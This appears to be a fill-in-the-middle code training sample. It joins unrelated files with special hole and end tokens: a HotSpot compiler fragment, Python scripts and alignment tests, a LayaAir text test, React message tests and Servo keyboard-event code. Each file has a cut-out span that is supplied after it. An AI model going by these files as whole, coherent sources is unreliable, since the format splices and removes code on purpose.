info->record_debug_info(compilation()->debug_info_recorder(), pc_offset);
if (info->exception_handlers() != NULL) {
compilation()->add_exception_handlers_for_pco(pc_offset, info->exception_handlers());
}
}
void LIR_Assembler::add_call_info(int pc_offset, CodeEmitInfo* cinfo) {
flush_debug_info(pc_offset);
cinfo->record_debug_info(compilation()->debug_info_recorder(), pc_offset);
if (cinfo->exception_handlers() != NULL) {
compilation()->add_exception_handlers_for_pco(pc_offset, cinfo->exception_handlers());
}
}
static ValueStack* debug_info(Instruction* ins) {
StateSplit* ss = ins->as_StateSplit();
if (ss != NULL) return ss->state();
return ins->state_before();
}
void LIR_Assembler::process_debug_info(LIR_Op* op) {
Instruction* src = op->source();
if (src == NULL) return;
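// Track the most recent instruction that carries debug state; the actual
// non-safepoint debug info is flushed lazily for the pc range it covers.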
int pc_offset = code_offset();
if (_pending_non_safepoint == src) {
_pending_non_safepoint_offset = pc_offset;
return;
}
ValueStack* vstack = debug_info(src);
if (vstack == NULL) return;
if (_pending_non_safepoint != NULL) {
// Got some old debug info. Get rid of it.
if (debug_info(_pending_non_safepoint) == vstack) {
_pending_non_safepoint_offset = pc_offset;
return;
}
if (_pending_non_safepoint_offset < pc_offset) {
record_non_safepoint_debug_info();
}
_pending_non_safepoint = NULL;
}
// Remember the debug info.
if (pc_offset > compilation()->debug_info_recorder()->last_pc_offset()) {
_pending_non_safepoint = src;
_pending_non_safepoint_offset = pc_offset;
}
}
// Index caller states in s, where 0 is the oldest, 1 its callee, etc.
// Return NULL if n is too large.
// Returns the caller_bci for the next-younger state, also.
static ValueStack* nth_oldest(ValueStack* s, int n, int& bci_result) {
ValueStack* t = s;
for (int i = 0; i < n; i++) {
if (t == NULL) break;
t = t->caller_state();
}
if (t == NULL) return NULL;
for (;;) {
ValueStack* tc = t->caller_state();
if (tc == NULL) return s;
t = tc;
bci_result = tc->bci();
s = s->caller_state();
}
}
void LIR_Assembler::record_non_safepoint_debug_info() {
int pc_offset = _pending_non_safepoint_offset;
ValueStack* vstack = debug_info(_pending_non_safepoint);
int bci = vstack->bci();
DebugInformationRecorder* debug_info = compilation()->debug_info_recorder();
assert(debug_info->recording_non_safepoints(), "sanity");
debug_info->add_non_safepoint(pc_offset);
// Visit scopes from oldest to youngest.
for (int n = 0; ; n++) {
int s_bci = bci;
ValueStack* s = nth_oldest(vstack, n, s_bci);
if (s == NULL) break;
IRScope* scope = s->scope();
//Always pass false for reexecute since these ScopeDescs are never used for deopt
methodHandle null_mh;
debug_info->describe_scope(pc_offset, null_mh, scope->method(), s->bci(), false/*reexecute*/);
}
debug_info->end_non_safepoint(pc_offset);
}
ImplicitNullCheckStub* LIR_Assembler::add_debug_info_for_null_check_here(CodeEmitInfo* cinfo) {
return add_debug_info_for_null_check(code_offset(), cinfo);
}
ImplicitNullCheckStub* LIR_Assembler::add_debug_info_for_null_check(int pc_offset, CodeEmitInfo* cinfo) {
ImplicitNullCheckStub* stub = new ImplicitNullCheckStub(pc_offset, cinfo);
append_code_stub(stub);
return stub;
}
void LIR_Assembler::add_debug_info_for_div0_here(CodeEmitInfo* info) {
add_debug_info_for_div0(code_offset(), info);
}
void LIR_Assembler::add_debug_info_for_div0(int pc_offset, CodeEmitInfo* cinfo) {
DivByZeroStub* stub = new DivByZeroStub(pc_offset, cinfo);
append_code_stub(stub);
}
void LIR_Assembler::emit_rtcall(LIR_OpRTCall* op) {
rt_call(op->result_opr(), op->addr(), op->arguments(), op->tmp(), op->info());
}
void LIR_Assembler::emit_call(LIR_OpJavaCall* op) {
verify_oop_map(op->info());
if (os::is_MP()) {
// must align calls sites, otherwise they can't be updated atomically on MP hardware
align_call(op->code());
}
// emit the static call stub stuff out of line
emit_static_call_stub();
CHECK_BAILOUT();
switch (op->code()) {
case lir_static_call:
case lir_dynamic_call:
call(op, relocInfo::static_call_type);
break;
case lir_optvirtual_call:
call(op, relocInfo::opt_virtual_call_type);
break;
case lir_icvirtual_call:
ic_call(op);
break;
case lir_virtual_call:
vtable_call(op);
break;
default:
fatal("unexpected op code: %s", op->name());
break;
}
// JSR 292
// Record if this method has MethodHandle invokes.
if (op->is_method_handle_invoke()) {
compilation()->set_has_method_handle_invokes(true);
}
#if defined(X86) && defined(TIERED)
// C2 leave fpu stack dirty clean it
if (UseSSE < 2) {
int i;
for ( i = 1; i <= 7 ; i++ ) {
ffree(i);
}
if (!op->result_opr()->is_float_kind()) {
ffree(0);
}
}
#endif // X86 && TIERED
}
void LIR_Assembler::emit_opLabel(LIR_OpLabel* op) {
_masm->bind (*(op->label()));
}
void LIR_Assembler::emit_op1(LIR_Op1* op) {
switch (op->code()) {
case lir_move:
if (op->move_kind() == lir_move_volatile) {
assert(op->patch_code() == lir_patch_none, "can't patch volatiles");
volatile_move_op(op->in_opr(), op->result_opr(), op->type(), op->info());
} else {
move_op(op->in_opr(), op->result_opr(), op->type(),
op->patch_code(), op->info(), op->pop_fpu_stack(),
op->move_kind() == lir_move_unaligned,
op->move_kind() == lir_move_wide);
}
break;
case lir_roundfp: {
LIR_OpRoundFP* round_op = op->as_OpRoundFP();
roundfp_op(round_op->in_opr(), round_op->tmp(), round_op->result_opr(), round_op->pop_fpu_stack());
break;
}
case lir_return:
return_op(op->in_opr());
break;
case lir_safepoint:
if (compilation()->debug_info_recorder()->last_pc_offset() == code_offset()) {
_masm->nop();
}
safepoint_poll(op->in_opr(), op->info());
break;
case lir_fxch:
fxch(op->in_opr()->as_jint());
break;
case lir_fld:
fld(op->in_opr()->as_jint());
break;
case lir_ffree:
ffree(op->in_opr()->as_jint());
break;
case lir_branch:
break;
case lir_push:
push(op->in_opr());
break;
case lir_pop:
pop(op->in_opr());
break;
case lir_neg:
negate(op->in_opr(), op->result_opr());
break;
case lir_leal:
leal(op->in_opr(), op->result_opr());
break;
case lir_null_check:
if (GenerateCompilerNullChecks) {
ImplicitNullCheckStub* stub = add_debug_info_for_null_check_here(op->info());
if (op->in_opr()->is_single_cpu()) {
_masm->null_check(op->in_opr()->as_register(), stub->entry());
} else {
Unimplemented();
}
}
break;
case lir_monaddr:
monitor_address(op->in_opr()->as_constant_ptr()->as_jint(), op->result_opr());
break;
#ifdef SPARC
case lir_pack64:
pack64(op->in_opr(), op->result_opr());
break;
case lir_unpack64:
unpack64(op->in_opr(), op->result_opr());
break;
#endif
case lir_unwind:
unwind_op(op->in_opr());
break;
default:
Unimplemented();
break;
}
}
void LIR_Assembler::emit_op0(LIR_Op0* op) {
switch (op->code()) {
case lir_word_align: {
_masm->align(BytesPerWord);
break;
}
case lir_nop:
assert(op->info() == NULL, "not supported");
_masm->nop();
break;
case lir_label:
Unimplemented();
break;
case lir_build_frame:
build_frame();
break;
case lir_std_entry:
// init offsets
offsets()->set_value(CodeOffsets::OSR_Entry, _masm->offset());
_masm->align(CodeEntryAlignment);
if (needs_icache(compilation()->method())) {
check_icache();
}
offsets()->set_value(CodeOffsets::Verified_Entry, _masm->offset());
_masm->verified_entry();
build_frame();
offsets()->set_value(CodeOffsets::Frame_Complete, _masm->offset());
break;
case lir_osr_entry:
offsets()->set_value(CodeOffsets::OSR_Entry, _masm->offset());
osr_entry();
break;
case lir_24bit_FPU:
set_24bit_FPU();
break;
case lir_reset_FPU:
reset_FPU();
break;
case lir_breakpoint:
breakpoint();
break;
case lir_fpop_raw:
fpop();
break;
case lir_membar:
membar();
break;
case lir_membar_acquire:
membar_acquire();
break;
case lir_membar_release:
membar_release();
break;
case lir_membar_loadload:
membar_loadload();
break;
case lir_membar_storestore:
membar_storestore();
break;
case lir_membar_loadstore:
membar_loadstore();
break;
case lir_membar_storeload:
membar_storeload();
break;
case lir_get_thread:
get_thread(op->result_opr());
break;
default:
ShouldNotReachHere();
break;
}
}
void LIR_Assembler::emit_op2(LIR_Op2* op) {
switch (op->code()) {
case lir_cmp:
if (op->info() != NULL) {
assert(op->in_opr1()->is_address() || op->in_opr2()->is_address(),
"shouldn't be codeemitinfo for non-address operands");
add_debug_info_for_null_check_here(op->info()); // exception possible
}
comp_op(op->condition(), op->in_opr1(), op->in_opr2(), op);
break;
case lir_cmp_l2i:
case lir_cmp_fd2i:
case lir_ucmp_fd2i:
comp_fl2i(op->code(), op->in_opr1(), op->in_opr2(), op->result_opr(), op);
break;
case lir_cmove:
cmove(op->condition(), op->in_opr1(), op->in_opr2(), op->result_opr(), op->type());
break;
case lir_shl:
case lir_shr:
case lir_ushr:
if (op->in_opr2()->is_constant()) {
shift_op(op->code(), op->in_opr1(), op->in_opr2()->as_constant_ptr()->as_jint(), op->result_opr());
} else {
shift_op(op->code(), op->in_opr1(), op->in_opr2(), op->result_opr(), op->tmp1_opr());
}
break;
case lir_add:
case lir_sub:
case lir_mul:
case lir_mul_strictfp:
case lir_div:
case lir_div_strictfp:
case lir_rem:
assert(op->fpu_pop_count() < 2, "");
arith_op(
op->code(),
op->in_opr1(),
op->in_opr2(),
op->result_opr(),
op->info(),
op->fpu_pop_count() == 1);
break;
case lir_abs:
case lir_sqrt:
case lir_sin:
case lir_tan:
case lir_cos:
case lir_log10:
case lir_pow:
intrinsic_op(op->code(), op->in_opr1(), op->in_opr2(), op->result_opr(), op);
break;
case lir_logic_and:
case lir_logic_or:
case lir_logic_xor:
logic_op(
op->code(),
op->in_opr1(),
op->in_opr2(),
op->result_opr());
break;
case lir_throw:
throw_op(op->in_opr1(), op->in_opr2(), op->info());
break;
case lir_xadd:
case lir_xchg:
atomic_op(op->code(), op->in_opr1(), op->in_opr2(), op->result_opr(), op->tmp1_opr());
break;
default:
Unimplemented();
break;
}
}
void LIR_Assembler::build_frame() {
_masm->build_frame(initial_frame_size_in_bytes(), bang_size_in_bytes());
}
void LIR_Assembler::roundfp_op(LIR_Opr src, LIR_Opr tmp, LIR_Opr dest, bool pop_fpu_stack) {
assert((src->is_single_fpu() && dest->is_single_stack()) ||
(src->is_double_fpu() && dest->is_double_stack()),
"round_fp: rounds register -> stack location");
reg2stack (src, dest, src->type(), pop_fpu_stack);
}
void LIR_Assembler::move_op(LIR_Opr src, LIR_Opr dest, BasicType type, LIR_PatchCode patch_code, CodeEmitInfo* info, bool pop_fpu_stack, bool unaligned, bool wide) {
if (src->is_register()) {
if (dest->is_register()) {
assert(patch_code == lir_patch_none && info == NULL, "no patching and info allowed here");
reg2reg(src, dest);
} else if (dest->is_stack()) {
assert(patch_code == lir_patch_none && info == NULL, "no patching and info allowed here");
reg2stack(src, dest, type, pop_fpu_stack);
} else if (dest->is_address()) {
reg2mem(src, dest, type, patch_code, info, pop_fpu_stack, wide, unaligned);
} else {
ShouldNotReachHere();
}
} else if (src->is_stack()) {
assert(patch_code == lir_patch_none && info == NULL, "no patching and info allowed here");
if (dest->is_register()) {
stack2reg(src, dest, type);
} else if (dest->is_stack()) {
stack2stack(src, dest, type);
} else {
ShouldNotReachHere();
}
} else if (src->is_constant()) {
if (dest->is_register()) {
const2reg(src, dest, patch_code, info); // patching is possible
} else if (dest->is_stack()) {
assert(patch_code == lir_patch_none && info == NULL, "no patching and info allowed here");
const2stack(src, dest);
} else if (dest->is_address()) {
assert(patch_code == lir_patch_none, "no patching allowed here");
const2mem(src, dest, type, info, wide);
} else {
ShouldNotReachHere();
}
} else if (src->is_address()) {
mem2reg(src, dest, type, patch_code, info, wide, unaligned);
} else {
ShouldNotReachHere();
}
}
void LIR_Assembler::verify_oop_map(CodeEmitInfo* info) {
#ifndef PRODUCT
if (VerifyOops) {
OopMapStream s(info->oop_map());
while (!s.is_done()) {
OopMapValue v = s.current();
if (v.is_oop()) {
VMReg r = v.reg();
if (!r->is_stack()) {
stringStream st;
st.print("bad oop %s at %d", r->as_Register()->name(), _masm->offset());
#ifdef SPARC
_masm->_verify_oop(r->as_Register(), os::strdup(st.as_string(), mtCompiler), __FILE__, __LINE__);
#else
_masm->verify_oop(r->as_Register());
#endif
} else {
_masm->verify_stack_oop(r->reg2stack() * VMRegImpl::stack_slot_size);
}
}
check_codespace();
CHECK_BAILOUT();
s.next();
}
}
#endif
}<|fim▁end|>
|
s->print_name(&st);
st.print(" slow case");
|
<|file_name|>provinces_script.py<|end_file_name|><|fim▁begin|># coding: utf-8
import sys
reload(sys)<|fim▁hole|>sys.setdefaultencoding('utf-8')
import json
china = json.loads(open('china.json', 'r').read()) # slow
new_provs = []
new_citys = []
for prov in china['children']:
new_provs.append(prov['name'])
for city in prov['children']:
if city['name'] not in [u'市辖区', u'县', u'省直辖县级行政区划']:
if city['name'][-1] == '市':
new_citys.append(city['name'][:-1])
else:
new_citys.append(city['name'])
print new_citys
with open('citys.json', 'w') as f:
f.write(json.dumps(new_citys, ensure_ascii=False, indent=4))<|fim▁end|>
| |
<|file_name|>test_local_align.py<|end_file_name|><|fim▁begin|>import six
from unittest import TestCase
from dark.reads import Read
from dark.local_align import LocalAlignment
class TestLocalAlign(TestCase):
"""
Test the LocalAlignment class.
With match +1, mismatch -1, gap open -1, gap extend -1 and
gap extend decay 0.0.
"""
def testPositiveMismatch(self):
"""
If the mismatch value passed is positive, an exception
must be raised.
"""
seq1 = Read('seq1', 'a')
seq2 = Read('seq2', 'a')
six.assertRaisesRegex(self, ValueError, 'Mismatch must be negative',
LocalAlignment, seq1, seq2, mismatch=3)
def testZeroMismatch(self):
"""
If the mismatch value passed is zero, an exception
must be raised.
"""
seq1 = Read('seq1', 'a')
seq2 = Read('seq2', 'a')
six.assertRaisesRegex(self, ValueError, 'Mismatch must be negative',
LocalAlignment, seq1, seq2, mismatch=0)
def testPositiveGap(self):
"""
If the gap value passed is positive, an exception
must be raised.
"""
seq1 = Read('seq1', 'a')
seq2 = Read('seq2', 'a')
six.assertRaisesRegex(self, ValueError, 'Gap must be negative',
LocalAlignment, seq1, seq2, gap=3)
def testZeroGap(self):
"""
If the gap value passed is zero, an exception
must be raised.
"""
seq1 = Read('seq1', 'a')
seq2 = Read('seq2', 'a')
six.assertRaisesRegex(self, ValueError, 'Gap must be negative',
LocalAlignment, seq1, seq2, gap=0)
def testPositiveGapExtend(self):
"""
If the gap extend value passed is positive, an exception
must be raised.
"""
seq1 = Read('seq1', 'a')
seq2 = Read('seq2', 'a')
six.assertRaisesRegex(self, ValueError,
'Gap extension penalty cannot be positive',
LocalAlignment, seq1, seq2, gapExtend=3)
def testFirstSequenceEmpty(self):
"""
If the first sequence passed is empty, an exception must be raised.
"""
seq1 = Read('seq1', '')
seq2 = Read('seq2', 'agtcagtcagtc')
six.assertRaisesRegex(self, ValueError, 'Empty sequence: seq1',
LocalAlignment, seq1, seq2)
def testSecondSequenceEmpty(self):
"""
If the second sequence passed is empty, an exception must be raised.
"""
seq1 = Read('seq1', 'agtcagtcagtc')
seq2 = Read('seq2', '')
six.assertRaisesRegex(self, ValueError, 'Empty sequence: seq2',
LocalAlignment, seq1, seq2)
def testBothSequencesEmpty(self):
"""
If two empty sequences are passed, an exception must be raised.
"""
seq1 = Read('seq1', '')
seq2 = Read('seq2', '')
six.assertRaisesRegex(self, ValueError, 'Empty sequence: seq1',
LocalAlignment, seq1, seq2)
def testGapAtStartOfSeq1(self):
seq1 = Read('seq1', 'gaatcg')
seq2 = Read('seq2', 'cgaatcg')
align = LocalAlignment(seq1, seq2)
result = align.createAlignment(resultFormat=str)
alignment = ('\nCigar string of aligned region: 6=\n'
'seq1 Match start: 1 Match end: 6\n'
'seq2 Match start: 2 Match end: 7\n'
'seq1 1 GAATCG 6\n'
' ||||||\n'
'seq2 2 GAATCG 7')
self.assertEqual(result, alignment)
def testGapAtStartOfSeq2(self):
seq1 = Read('seq1', 'cgaatcg')
seq2 = Read('seq2', 'gaatcg')
align = LocalAlignment(seq1, seq2)
result = align.createAlignment(resultFormat=str)
alignment = ('\nCigar string of aligned region: 6=\n'
'seq1 Match start: 2 Match end: 7\n'
'seq2 Match start: 1 Match end: 6\n'
'seq1 2 GAATCG 7\n'
' ||||||\n'
'seq2 1 GAATCG 6')
self.assertEqual(result, alignment)
def testGapAtEndOfSeq1(self):
seq1 = Read('seq1', 'cgaatc')
seq2 = Read('seq2', 'cgaatcg')
align = LocalAlignment(seq1, seq2)
result = align.createAlignment(resultFormat=str)
alignment = ('\nCigar string of aligned region: 6=\n'
'seq1 Match start: 1 Match end: 6\n'
'seq2 Match start: 1 Match end: 6\n'
'seq1 1 CGAATC 6\n'
' ||||||\n'
'seq2 1 CGAATC 6')
self.assertEqual(result, alignment)
def testGapAtEndOfSeq2(self):
seq1 = Read('seq1', 'cgaatcg')
seq2 = Read('seq2', 'cgaatc')
align = LocalAlignment(seq1, seq2)
result = align.createAlignment(resultFormat=str)
alignment = ('\nCigar string of aligned region: 6=\n'
'seq1 Match start: 1 Match end: 6\n'
'seq2 Match start: 1 Match end: 6\n'
'seq1 1 CGAATC 6\n'
' ||||||\n'
'seq2 1 CGAATC 6')
self.assertEqual(result, alignment)
def testGapAtBothEndsOfSeq1(self):
seq1 = Read('seq1', 'gaatc')
seq2 = Read('seq2', 'cgaatcg')
align = LocalAlignment(seq1, seq2)
result = align.createAlignment(resultFormat=str)
alignment = ('\nCigar string of aligned region: 5=\n'
'seq1 Match start: 1 Match end: 5\n'
'seq2 Match start: 2 Match end: 6\n'
'seq1 1 GAATC 5\n'
' |||||\n'
'seq2 2 GAATC 6')
self.assertEqual(result, alignment)
def testGapAtBothEndsOfSeq2(self):
seq1 = Read('seq1', 'cgaatcg')
seq2 = Read('seq2', 'gaatc')
align = LocalAlignment(seq1, seq2)
result = align.createAlignment(resultFormat=str)
alignment = ('\nCigar string of aligned region: 5=\n'
'seq1 Match start: 2 Match end: 6\n'
'seq2 Match start: 1 Match end: 5\n'
'seq1 2 GAATC 6\n'
' |||||\n'
'seq2 1 GAATC 5')
self.assertEqual(result, alignment)
def testAlignmentWithGapInMiddle(self):
seq1 = Read('seq1', 'agtcagtcagtc')
seq2 = Read('seq2', 'cgaatcg')
align = LocalAlignment(seq1, seq2)
result = align.createAlignment(resultFormat=str)
alignment = ('\nCigar string of aligned region: 2=1D1=\n'
'seq1 Match start: 7 Match end: 10\n'
'seq2 Match start: 5 Match end: 7\n'
'seq1 7 TCAG 10\n'
' || |\n'
'seq2 5 TC-G 7')
self.assertEqual(result, alignment)
def testTwoEqualSequences(self):
"""<|fim▁hole|> show that the sequences completely match.
"""
seq1 = Read('seq1', 'cgaatcg')
seq2 = Read('seq2', 'cgaatcg')
align = LocalAlignment(seq1, seq2)
result = align.createAlignment(resultFormat=str)
alignment = ('\nCigar string of aligned region: 7=\n'
'seq1 Match start: 1 Match end: 7\n'
'seq2 Match start: 1 Match end: 7\n'
'seq1 1 CGAATCG 7\n'
' |||||||\n'
'seq2 1 CGAATCG 7')
self.assertEqual(result, alignment)
def testTwoCompletelyDifferentSequences(self):
"""
When two completely different sequences are given, the result
should be the two sequences with an empty alignment.
"""
seq1 = Read('seq1', 'aaaaaa')
seq2 = Read('seq2', 'gggggg')
align = LocalAlignment(seq1, seq2)
result = align.createAlignment(resultFormat=str)
alignment = ('\nNo alignment between seq1 and seq2\n')
self.assertEqual(result, alignment)
def testWikiAnswer(self):
"""
Test the example given in Wikipedia:
http://en.wikipedia.org/wiki/Smith%E2%80%93Waterman_algorithm
"""
seq1 = Read('seq1', 'ACACACTA')
seq2 = Read('seq2', 'AGCACACA')
align = LocalAlignment(seq1, seq2, match=2)
result = align.createAlignment(resultFormat=str)
alignment = ('\nCigar string of aligned region: 1=1I5=1D1=\n'
'seq1 Match start: 1 Match end: 8\n'
'seq2 Match start: 1 Match end: 8\n'
'seq1 1 A-CACACTA 8\n'
' | ||||| |\n'
'seq2 1 AGCACAC-A 8')
self.assertEqual(result, alignment)
def testWikiAnswerWithMatchOne(self):
"""
Test the example given in Wikipedia
http://en.wikipedia.org/wiki/Smith%E2%80%93Waterman_algorithm
Wikipedia uses a match score of two, here we use a score of one.
"""
seq1 = Read('seq1', 'ACACACTA')
seq2 = Read('seq2', 'AGCACACA')
align = LocalAlignment(seq1, seq2, match=1)
result = align.createAlignment(resultFormat=str)
alignment = ('\nCigar string of aligned region: 5=1D1=\n'
'seq1 Match start: 2 Match end: 8\n'
'seq2 Match start: 3 Match end: 8\n'
'seq1 2 CACACTA 8\n'
' ||||| |\n'
'seq2 3 CACAC-A 8')
self.assertEqual(result, alignment)
def testWikiAnswerAsDict(self):
"""
Test the example given in Wikipedia:
http://en.wikipedia.org/wiki/Smith%E2%80%93Waterman_algorithm
with the return result being a dict.
"""
seq1 = Read('seq1', 'ACACACTA')
seq2 = Read('seq2', 'AGCACACA')
align = LocalAlignment(seq1, seq2, match=2)
result = align.createAlignment()
self.assertEqual(
{
'cigar': '1=1I5=1D1=',
'sequence1Start': 1,
'sequence1End': 8,
'sequence2Start': 1,
'sequence2End': 8,
'text': [
'seq1 1 A-CACACTA 8',
' | ||||| |',
'seq2 1 AGCACAC-A 8',
]
},
result
)
def testWikiAnswerWithMatchOneAsDict(self):
"""
Test the example given in Wikipedia
http://en.wikipedia.org/wiki/Smith%E2%80%93Waterman_algorithm
Wikipedia uses a match score of two, here we use a score of one.
Get the result as a dict.
"""
seq1 = Read('seq1', 'ACACACTA')
seq2 = Read('seq2', 'AGCACACA')
align = LocalAlignment(seq1, seq2, match=1)
result = align.createAlignment()
self.assertEqual(
{
'cigar': '5=1D1=',
'sequence1Start': 2,
'sequence1End': 8,
'sequence2Start': 3,
'sequence2End': 8,
'text': [
'seq1 2 CACACTA 8',
' ||||| |',
'seq2 3 CACAC-A 8',
]
},
result
)<|fim▁end|>
|
When two identical sequences are given, the result should
|
<|file_name|>testText.ts<|end_file_name|><|fim▁begin|>import {delay} from './delay'
import { Laya } from 'Laya';
import { Text } from 'laya/display/Text';
import { TextRender } from 'laya/webgl/text/TextRender';
export class Main {
constructor() {
Laya.init(800,600);
//Laya.stage.scaleMode = 'fixedwidth';
Laya.stage.screenMode = 'none';
//Laya.Stat.show();
this.test1();
}
/**
* After part of a text texture page has been freed, it should be restored correctly.
* Covers the case where cacheAs 'normal' is used.
*/
async test1(){
// First create two text textures; the font is large enough that four characters fill one texture page.
var t1 = new Text();
t1.fontSize = 120;
t1.text = 'abcd'; // texture 1 is abcd
t1.color='red';
t1.cacheAs='normal';
Laya.stage.addChild(t1);
var t2 = new Text();
t2.pos(0,120);
t2.fontSize = 120;
t2.text = 'efgh'; // 2是efgh<|fim▁hole|> await delay(10);
// Hide the two texts above so their glyphs are no longer in use.
t1.visible=false;
t2.visible=false;
await delay(10);
// t3 uses 3 glyphs from the first texture and 1 from the second; after a GC the second texture is reclaimed and the 'd' on the first is freed.
var t3 = new Text();
t3.pos(0,240);
t3.text='abce';
t3.fontSize=120;
t3.color='red';
Laya.stage.addChild(t3);
await delay(10); // wait for it to be drawn
//t3.visible=false;
TextRender.textRenderInst.GC();
await delay(10);
t1.visible=true; // 'd' has been freed, so showing t1 again should trigger it to be recreated
await delay(10); // wait for the render result
(window as any).testEnd=true; // tell the test harness it can stop
}
}
// Activate the startup class
new Main();<|fim▁end|>
|
t2.color='red';
Laya.stage.addChild(t2);
|
<|file_name|>convert-ps3-output.py<|end_file_name|><|fim▁begin|>import os
import sys
def main():
if len(sys.argv) <= 2:
print("This script generates the .expected file from your PS3's debug logs.")
print("")
print("Usage: convert-ps3-output.py <input> <output>")
print("Example: convert-ps3-output.py hello_world.log hello_world.expected")
return False
#Parse and check arguments
inputFile = sys.argv[1]
outputFile = sys.argv[2]
if not os.path.isfile(inputFile):
print("[!] Input file does not exist")
return False<|fim▁hole|> data = f.read()
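# The PS3 debug log is CRLF-delimited: keep everything after the "/app_home/..."
# line, cut everything from the trailing "END LOG" marker, and normalize CRLF to LF.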
data = data[data.find(b"/app_home/"):]
data = data[data.find(b"\x0D\x0A")+2:]
data = data[:data.rindex(b"END LOG")-12]
data = data.replace(b"\x0D\x0A", b"\x0A")
w.write(data)
w.close()
if __name__ == "__main__":
main()<|fim▁end|>
|
f = open(inputFile, 'rb')
w = open(outputFile, 'wb')
|
<|file_name|>Message.spec.js<|end_file_name|><|fim▁begin|>import React from 'react';
import { render as mount } from 'enzyme';
import { Provider as ContextProvider } from '../common/context';
import Message from './Message';
describe('Message', () => {
function render(message, context) {
// need the spans otherwise the document has 0 html elements in it.
return mount(
<span>
<ContextProvider value={context}>{message}</ContextProvider>
</span>,
);
}
it('translates the given message', () => {
const translateAsParts = jest.fn(() => [
{ dangerous: false, value: 'translated ' },
{ dangerous: true, value: 'value' },
]);
const context = { translateAsParts };
const component = render(<Message>message.id</Message>, context);
expect(translateAsParts).toHaveBeenCalledTimes(1);
expect(translateAsParts).toHaveBeenCalledWith('message.id', {});
expect(component.text()).toEqual('translated value');
});
it('translates with parameters', () => {
const translateAsParts = jest.fn((key, params) => [
{ dangerous: false, value: 'translated value ' },
{ dangerous: true, value: params.test },
]);
const context = { translateAsParts };
const component = render(<Message params={{ test: 'hello' }}>message.id</Message>, context);
expect(translateAsParts).toHaveBeenCalledTimes(1);
expect(translateAsParts).toHaveBeenCalledWith('message.id', { test: 'hello' });
expect(component.text()).toEqual('translated value hello');
});
it('translates with sanitized html', () => {
const html = '<h1>this is a heading<b>with bold</b></h1>';<|fim▁hole|> const translateAsParts = jest.fn(() => [{ dangerous: false, value: html }]);
const context = { translateAsParts };
const component = render(<Message>message.id</Message>, context);
expect(component.html()).toBe(
'<h1>this is a heading<b>with bold</b></h1>',
);
});
it('allows to translate things as html', () => {
const translateAsParts = jest.fn(() => [
{ dangerous: false, value: '<h1>some safe html</h1>' },
{ dangerous: true, value: '<span>some sketchy user input</span>' },
]);
const context = { translateAsParts };
const component = render(<Message dangerouslyTranslateInnerHTML="message.id" />, context);
expect(component.html()).toBe(
'<span><h1>some safe html</h1></span><span>some sketchy user input</span>',
);
});
it('allows to translate into a string', () => {
const translateAsParts = jest.fn(() => [
{ dangerous: false, value: 'just some ' },
{ dangerous: true, value: 'text' },
]);
const context = { translateAsParts };
const component = render(<Message asString>message.id</Message>, context);
expect(component.html()).toBe('just some text');
});
});<|fim▁end|>
| |
<|file_name|>keyboardevent.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
use dom::bindings::cell::DOMRefCell;
use dom::bindings::codegen::Bindings::KeyboardEventBinding;
use dom::bindings::codegen::Bindings::KeyboardEventBinding::{KeyboardEventConstants, KeyboardEventMethods};
use dom::bindings::codegen::Bindings::UIEventBinding::UIEventMethods;
use dom::bindings::error::Fallible;
use dom::bindings::inheritance::Castable;
use dom::bindings::js::{Root, RootedReference};
use dom::bindings::reflector::reflect_dom_object;
use dom::bindings::str::DOMString;
use dom::event::Event;
use dom::uievent::UIEvent;
use dom::window::Window;
use msg::constellation_msg;
use msg::constellation_msg::{Key, KeyModifiers};
use std::borrow::Cow;
use std::cell::Cell;
no_jsmanaged_fields!(Key);
#[dom_struct]
pub struct KeyboardEvent {
uievent: UIEvent,
key: Cell<Option<Key>>,
key_string: DOMRefCell<DOMString>,
code: DOMRefCell<DOMString>,
location: Cell<u32>,
ctrl: Cell<bool>,
alt: Cell<bool>,
shift: Cell<bool>,
meta: Cell<bool>,
repeat: Cell<bool>,
is_composing: Cell<bool>,
char_code: Cell<Option<u32>>,
key_code: Cell<u32>,
printable: Cell<Option<char>>,
}
impl KeyboardEvent {
fn new_inherited() -> KeyboardEvent {
KeyboardEvent {
uievent: UIEvent::new_inherited(),
key: Cell::new(None),
key_string: DOMRefCell::new(DOMString::new()),
code: DOMRefCell::new(DOMString::new()),
location: Cell::new(0),
ctrl: Cell::new(false),
alt: Cell::new(false),
shift: Cell::new(false),
meta: Cell::new(false),
repeat: Cell::new(false),
is_composing: Cell::new(false),
char_code: Cell::new(None),
key_code: Cell::new(0),
printable: Cell::new(None),
}
}
pub fn new_uninitialized(window: &Window) -> Root<KeyboardEvent> {
reflect_dom_object(box KeyboardEvent::new_inherited(),
window,
KeyboardEventBinding::Wrap)
}
pub fn new(window: &Window,
type_: DOMString,
can_bubble: bool,
cancelable: bool,
view: Option<&Window>,
_detail: i32,
ch: Option<char>,
key: Option<Key>,
key_string: DOMString,
code: DOMString,
location: u32,
repeat: bool,
is_composing: bool,
ctrl_key: bool,
alt_key: bool,
shift_key: bool,
meta_key: bool,
char_code: Option<u32>,
key_code: u32) -> Root<KeyboardEvent> {
let ev = KeyboardEvent::new_uninitialized(window);
ev.InitKeyboardEvent(type_, can_bubble, cancelable, view, key_string, location,
DOMString::new(), repeat, DOMString::new());
ev.key.set(key);
*ev.code.borrow_mut() = code;
ev.ctrl.set(ctrl_key);
ev.alt.set(alt_key);
ev.shift.set(shift_key);
ev.meta.set(meta_key);
ev.char_code.set(char_code);
ev.printable.set(ch);
ev.key_code.set(key_code);
ev.is_composing.set(is_composing);
ev
}
pub fn Constructor(window: &Window,
type_: DOMString,
init: &KeyboardEventBinding::KeyboardEventInit) -> Fallible<Root<KeyboardEvent>> {
let event = KeyboardEvent::new(window,
type_,
init.parent.parent.parent.bubbles,
init.parent.parent.parent.cancelable,
init.parent.parent.view.r(),
init.parent.parent.detail,
None,
key_from_string(&init.key, init.location),
init.key.clone(), init.code.clone(), init.location,
init.repeat, init.isComposing, init.parent.ctrlKey,
init.parent.altKey, init.parent.shiftKey, init.parent.metaKey,
None, 0);
Ok(event)
}
pub fn key_properties(ch: Option<char>, key: Key, mods: KeyModifiers)
-> KeyEventProperties {
KeyEventProperties {
key_string: key_value(ch, key, mods),
code: code_value(key),
location: key_location(key),
char_code: ch.map(|ch| ch as u32),
key_code: key_keycode(key),
}
}
}
impl KeyboardEvent {
pub fn printable(&self) -> Option<char> {
self.printable.get()
}
pub fn get_key(&self) -> Option<Key> {
self.key.get().clone()
}
